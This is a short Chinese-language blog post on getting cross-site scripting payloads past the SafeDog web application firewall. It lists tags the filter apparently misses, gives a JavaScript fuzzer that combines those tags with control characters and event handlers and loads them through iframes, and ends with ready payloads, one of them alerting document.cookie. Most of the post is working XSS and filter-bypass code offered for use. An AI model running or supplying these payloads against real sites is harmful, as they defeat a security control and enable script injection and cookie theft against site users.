HackerGu‘s Blog如果无法学会绕过,那就只有一个结果:
Bypass
学习文章来源:米斯特安全团队
JS代码往往要在<script>标签内或者在 “On” 事件和 “javascript” 伪协议内才可以执行。
标签表达式: <标签名 控制字符="" 属性名="数据值" 事件名="事件值">
没被安全狗过滤的标签:
a b q br dd dl dt h1 h2 h3 h4 h5 h6 hr bdi bdo big del dfn dir div kbd map var wbr abbr area base body head html main mark menu meta aside audio meter video applet button dialog header keygen acronym address article details basefont datalist menuitem blockquote
可以弹窗的:
alert,prompt ,confirm,base64加密,编码绕过
payload代码:
var i,j,k,xss,f=0;
var ons = ["onload","onerror"];
var labs = ["a","b","q","br","dd","dl","dt","h1","del","abbr","video","base","audio","details"];
var hexs= ["%09","%00","%0d","%0a"];
for(i=0;i<labs.length;i++){
for(j=0;j<hexs.length;j++){
for(k=0;k<ons.length;k++){
xss = f+'<'+labs[i]+hexs[j]+ons[k]+"=alert("+f+") src=a>a";
var body = document.getElementsByTagName("body");
var div = document.createElement("div");
div.innerHTML = f+"<iframe src=\"http://127.0.0.1/index.php?fuzz="+xss+"\"></iframe>";
document.body.appendChild(div);
f = f+1;
}
}
}
可以用以上代码bypass安全狗
以上的代码,可以根据自己的需求进行修改,创造更多的绕过方法。
<dd%09onclick=alert(1)> <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object> <svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg> <img/11111111111111111111111111111/src=x/onerror=alert(1)> <input onclick=alert(1) value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa> <IFRAME width%3d"420" height%3d"315" frameborder%3d"0" onload%3d"alert(document.cookie)"><%2fIFRAME> <iframe srcdoc%3d'%26lt%3bbody onload%3dprompt%26lpar%3b1%26rpar%3b%26gt%3b'>
参考文章:
